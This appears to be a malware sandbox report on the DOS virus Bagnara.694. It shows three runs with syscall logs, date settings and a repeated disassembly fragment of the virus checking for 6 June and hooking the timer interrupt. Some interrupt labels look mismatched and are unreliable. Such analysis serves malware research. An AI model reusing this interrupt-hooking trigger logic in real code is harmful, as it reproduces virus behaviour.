Sample viewer

vx.netlux.org/Virus.DOS.Bagnara.694

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:55.327188863Z 24 PC: 12e45 | Reserved
2018-12-17T22:20:55.329751568Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:55.331019621Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:55.332256715Z 42 PC: 12ec6 | Get date
0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]

{"DateBased":true,"Day":6,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3641,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:46.859399819Z 24 PC: 12e45 | Reserved
2018-12-25T11:49:46.860936069Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.861923449Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.862951164Z 42 PC: 12ec6 | Get date
0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]
2018-12-25T11:49:46.865497451Z 53 PC: 12ed4 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T11:49:46.866572773Z 37 PC: 12ee4 | Set interrupt vector (Interrupt = '8' AKA 'Console input without echo')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3641,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:46.89793991Z 24 PC: 12e45 | Reserved
2018-12-25T11:49:46.900584113Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.902108293Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.903587293Z 42 PC: 12ec6 | Get date
0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]